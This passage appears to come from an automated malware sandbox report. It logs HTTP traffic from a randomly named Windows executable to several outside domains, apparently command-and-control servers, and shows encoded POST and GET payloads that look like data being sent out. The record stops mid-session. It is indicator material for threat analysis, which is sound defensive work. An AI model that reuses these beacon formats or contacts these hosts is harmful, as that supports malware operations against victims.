                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.4 | 49762 | 203.161.41.207 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:34:52.421475887 CEST | 451 | OUT | GET /etzb/?gNl=y1l9UKEI/lQ7TFqul8cFoyc9amTFojzHvoSS/tM0SGjjEe4pj9aFUBRbEUlPxRBYTwZ9epMSinUSWJlauv4T6Qd4dJfAkKACIvt4qodfW5IqShEDlLijX08=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.soutsour.xyz
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:35:08.276060104 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:08 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.4 | 49763 | 216.194.173.237 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:35:13.564702034 CEST | 737 | OUT | POST /0guv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.mysticriverpath.com
                                              Origin: http://www.mysticriverpath.com
                                              Referer: http://www.mysticriverpath.com/0guv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 70 71 75 65 2b 72 30 42 47 2f 6f 37 55 6c 46 71 59 64 39 6f 47 6c 62 6e 6c 76 69 64 79 73 4e 44 76 6b 34 4c 4a 6b 39 74 6a 44 76 78 32 54 4c 69 57 62 6a 49 70 2b 41 79 32 74 45 51 6f 63 73 61 55 6e 6a 42 5a 69 53 32 41 70 48 4a 53 30 36 35 42 34 2f 37 37 57 50 59 4b 43 4a 47 42 58 41 32 59 79 55 66 33 78 52 39 36 77 55 4c 68 55 6f 36 34 71 4b 37 46 32 6a 33 6e 6c 68 38 70 6f 34 54 51 56 4c 6d 65 51 4c 48 6d 72 34 4c 31 4a 72 32 74 46 57 34 74 45 30 52 6b 67 6d 78 44 51 5a 75 67 30 6d 47 73 77 69 70 31 57 38 6d 5a 44 35 42 76 4d 6c 45 35 30 42 70 39 2b 73 4f 2b 30 70 31 5a 77 3d 3d
                                              Data Ascii: gNl=pque+r0BG/o7UlFqYd9oGlbnlvidysNDvk4LJk9tjDvx2TLiWbjIp+Ay2tEQocsaUnjBZiS2ApHJS065B4/77WPYKCJGBXA2YyUf3xR96wULhUo64qK7F2j3nlh8po4TQVLmeQLHmr4L1Jr2tFW4tE0RkgmxDQZug0mGswip1W8mZD5BvMlE50Bp9+sO+0p1Zw==
                                              Jul 8, 2024 09:35:14.146084070 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:14 GMT
                                              Server: Apache
                                              Content-Length: 315
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              22 | 192.168.2.4 | 49764 | 216.194.173.237 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:35:16.103528976 CEST | 757 | OUT | POST /0guv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.mysticriverpath.com
                                              Origin: http://www.mysticriverpath.com
                                              Referer: http://www.mysticriverpath.com/0guv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 70 71 75 65 2b 72 30 42 47 2f 6f 37 53 32 4e 71 61 2f 56 6f 45 46 62 6b 35 66 69 64 70 38 4d 4b 76 6b 30 4c 4a 6c 49 6f 6a 51 4c 78 7a 43 37 69 56 61 6a 49 71 2b 41 79 6a 64 46 61 6e 38 74 33 55 6e 75 68 5a 6a 75 32 41 70 44 4a 53 78 2b 35 41 50 54 34 35 47 50 47 54 79 4a 41 50 33 41 32 59 79 55 66 33 78 46 48 36 77 4d 4c 67 6c 34 36 36 4f 6d 6b 49 57 6a 34 69 56 68 38 74 6f 34 58 51 56 4b 31 65 52 48 74 6d 70 77 4c 31 4d 58 32 75 55 57 37 6d 45 30 62 71 41 6e 67 51 53 38 4b 68 33 57 4e 72 53 53 58 33 55 39 48 63 46 6f 62 2b 39 45 54 72 30 6c 61 67 35 6c 36 7a 33 55 38 43 77 47 38 64 34 79 2b 45 59 48 47 74 6e 71 2f 31 58 71 7a 51 70 38 3d
                                              Data Ascii: gNl=pque+r0BG/o7S2Nqa/VoEFbk5fidp8MKvk0LJlIojQLxzC7iVajIq+AyjdFan8t3UnuhZju2ApDJSx+5APT45GPGTyJAP3A2YyUf3xFH6wMLgl466OmkIWj4iVh8to4XQVK1eRHtmpwL1MX2uUW7mE0bqAngQS8Kh3WNrSSX3U9HcFob+9ETr0lag5l6z3U8CwG8d4y+EYHGtnq/1XqzQp8=
                                              Jul 8, 2024 09:35:16.693977118 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:16 GMT
                                              Server: Apache
                                              Content-Length: 315
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              23 | 192.168.2.4 | 49765 | 216.194.173.237 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:35:18.636713982 CEST | 10839 | OUT | POST /0guv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.mysticriverpath.com
                                              Origin: http://www.mysticriverpath.com
                                              Referer: http://www.mysticriverpath.com/0guv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 70 71 75 65 2b 72 30 42 47 2f 6f 37 53 32 4e 71 61 2f 56 6f 45 46 62 6b 35 66 69 64 70 38 4d 4b 76 6b 30 4c 4a 6c 49 6f 6a 51 44 78 76 67 6a 69 56 35 4c 49 72 2b 41 79 2f 4e 46 5a 6e 38 73 31 55 6e 32 2b 5a 6a 6a 42 41 72 72 4a 64 33 43 35 51 72 48 34 7a 47 50 47 62 53 4a 42 42 58 42 79 59 79 45 62 33 78 56 48 36 77 4d 4c 67 6d 77 36 7a 36 4b 6b 62 47 6a 33 6e 6c 68 4b 70 6f 34 7a 51 56 53 6c 65 52 54 58 6e 64 45 4c 32 74 6e 32 39 57 2b 37 6b 6b 30 56 36 51 6e 34 51 53 41 56 68 33 62 30 72 53 4b 39 33 57 68 48 52 41 4d 43 6d 2f 59 6c 2f 46 55 44 69 4a 64 53 74 47 49 61 4c 42 36 63 54 74 53 43 65 4c 65 6b 71 77 62 47 78 30 43 73 43 73 4e 57 34 43 32 69 65 62 6e 6a 44 62 48 73 54 47 39 45 44 71 35 75 55 2b 50 31 64 73 33 5a 57 52 2b 4c 44 39 4b 51 36 36 6c 52 4f 51 6d 71 44 56 43 30 50 67 4a 4a 4a 59 52 70 41 39 44 4a 78 51 2f 2b 62 66 56 77 70 2b 41 37 73 74 78 4c 59 59 4a 31 55 75 55 4d 6c 4a 66 62 5a 6c 39 54 36 41 49 48 6d 47 41 78 6e 6b 44 6a 73 58 30 53 33 38 75 74 5a 55 33 62 33 49 [TRUNCATED]
                                              Data Ascii: gNl= [TRUNCATED]
                                              Jul 8, 2024 09:35:19.234251022 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:19 GMT
                                              Server: Apache
                                              Content-Length: 315
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              24 | 192.168.2.4 | 49766 | 216.194.173.237 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:35:21.171313047 CEST | 458 | OUT | GET /0guv/?QdC=AFMh5N&gNl=koG+9f1JLs4iU3gpYtYeL1r94dP8/9FWskMDX1FP+QK1lg22bIT8kucy8PYjp4kPLlPGQE/9ELG4RRacCoDP+inEdxRGBXRQHVAT/D1/4SMcq2gI6by2YHg= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.mysticriverpath.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:35:21.744081020 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                              Date: Mon, 08 Jul 2024 07:35:21 GMT
                                              Server: Apache
                                              Content-Length: 315
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              25 | 192.168.2.4 | 49767 | 3.33.130.190 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:35:26.812578917 CEST | 722 | OUT | POST /g9bf/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.mscuration.com
                                              Origin: http://www.mscuration.com
                                              Referer: http://www.mscuration.com/g9bf/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 6f 51 62 32 30 54 5a 70 65 62 67 4a 52 47 77 44 79 4f 42 2f 37 6b 57 70 75 69 71 32 69 2b 4e 6e 39 65 4f 58 33 76 52 33 6e 6d 31 33 35 70 39 7a 44 5a 58 75 34 65 38 43 52 47 76 62 78 45 62 38 70 67 61 4a 6f 32 6e 30 53 59 67 57 54 6b 31 35 57 6e 67 63 2b 4a 31 71 61 49 68 50 4c 2b 4d 4e 36 38 46 54 54 55 6d 64 59 4e 77 36 54 77 2f 39 43 50 39 72 71 6f 6b 2b 41 5a 7a 6a 59 7a 64 68 6c 39 47 73 7a 70 45 4e 65 74 61 77 6e 56 4b 41 71 77 53 35 6d 6a 2f 37 59 4b 6f 52 76 43 66 7a 68 31 4b 53 68 52 49 7a 65 30 63 39 4c 30 78 49 39 69 75 33 6e 69 65 75 68 73 4c 53 79 6a 61 56 64 51 3d 3d
                                              Data Ascii: gNl=oQb20TZpebgJRGwDyOB/7kWpuiq2i+Nn9eOX3vR3nm135p9zDZXu4e8CRGvbxEb8pgaJo2n0SYgWTk15Wngc+J1qaIhPL+MN68FTTUmdYNw6Tw/9CP9rqok+AZzjYzdhl9GszpENetawnVKAqwS5mj/7YKoRvCfzh1KShRIze0c9L0xI9iu3nieuhsLSyjaVdQ==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              26 | 192.168.2.4 | 49768 | 3.33.130.190 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:35:29.340648890 CEST | 742 | OUT | POST /g9bf/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.mscuration.com
                                              Origin: http://www.mscuration.com
                                              Referer: http://www.mscuration.com/g9bf/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 6f 51 62 32 30 54 5a 70 65 62 67 4a 51 69 4d 44 39 4f 39 2f 39 45 57 6d 68 43 71 32 33 75 4e 6a 39 65 4b 58 33 75 56 6e 6e 55 52 33 35 49 4e 7a 45 74 6a 75 35 65 38 43 5a 6d 76 53 38 6b 62 6a 70 67 48 2b 6f 33 72 30 53 59 45 57 54 6c 46 35 57 55 34 66 73 70 31 6f 57 6f 68 52 45 65 4d 4e 36 38 46 54 54 55 44 56 59 4e 6f 36 51 41 76 39 44 75 39 73 6e 49 6b 39 4a 35 7a 6a 4c 6a 64 66 6c 39 48 4a 7a 73 68 69 65 76 79 77 6e 56 61 41 72 68 53 36 74 6a 2f 35 57 71 70 31 71 44 32 38 37 48 50 54 6d 68 51 54 41 41 6f 75 48 53 67 53 73 54 50 67 31 69 36 64 38 72 43 6d 2f 67 6e 63 47 54 68 74 35 72 46 6b 2b 4b 48 78 46 32 43 4a 37 63 44 4a 63 41 59 3d
                                              Data Ascii: gNl=oQb20TZpebgJQiMD9O9/9EWmhCq23uNj9eKX3uVnnUR35INzEtju5e8CZmvS8kbjpgH+o3r0SYEWTlF5WU4fsp1oWohREeMN68FTTUDVYNo6QAv9Du9snIk9J5zjLjdfl9HJzshievywnVaArhS6tj/5Wqp1qD287HPTmhQTAAouHSgSsTPg1i6d8rCm/gncGTht5rFk+KHxF2CJ7cDJcAY=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              27 | 192.168.2.4 | 49769 | 3.33.130.190 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 8, 2024 09:35:31.870661974 CEST | 10824 | OUT | POST /g9bf/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.mscuration.com
                                              Origin: http://www.mscuration.com
                                              Referer: http://www.mscuration.com/g9bf/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 6f 51 62 32 30 54 5a 70 65 62 67 4a 51 69 4d 44 39 4f 39 2f 39 45 57 6d 68 43 71 32 33 75 4e 6a 39 65 4b 58 33 75 56 6e 6e 55 5a 33 34 2b 5a 7a 48 4d 6a 75 6f 75 38 43 58 47 76 58 38 6b 62 75 70 67 50 79 6f 33 32 4a 53 61 73 57 63 6e 4e 35 51 6c 34 66 6e 70 31 6f 65 49 68 4d 4c 2b 4e 4e 36 38 55 62 54 55 54 56 59 4e 6f 36 51 47 44 39 4b 66 39 73 68 49 6b 2b 41 5a 7a 52 59 7a 63 79 6c 39 66 2f 7a 74 67 64 66 65 53 77 6d 31 71 41 6f 58 75 36 6b 6a 2f 33 58 61 70 74 71 44 72 38 37 48 54 6c 6d 69 4d 31 41 48 41 75 57 6b 78 36 37 77 33 42 6d 77 4f 43 6f 36 65 34 6e 53 4c 75 64 44 6c 6e 6f 75 46 4d 39 6f 53 66 4a 46 7a 72 6a 74 4c 51 41 6b 59 63 61 53 44 32 61 6f 70 6d 34 70 53 51 72 42 66 67 72 56 2f 6c 73 35 6e 61 55 4c 64 63 6f 74 65 2f 30 67 61 34 45 33 63 32 36 6d 69 6b 73 70 4b 70 39 38 33 43 75 50 6e 53 33 57 63 74 34 52 4c 70 31 2f 68 7a 4b 65 55 48 6a 61 6e 68 47 70 58 48 74 63 43 6e 68 75 39 30 44 63 31 59 34 61 75 59 2b 32 78 4c 67 73 63 7a 73 38 49 72 48 52 57 37 47 71 2f 67 6e 73 [TRUNCATED]
                                              Data Ascii: gNl= [TRUNCATED]


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               28 | 192.168.2.4 | 49770 | 3.33.130.190 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
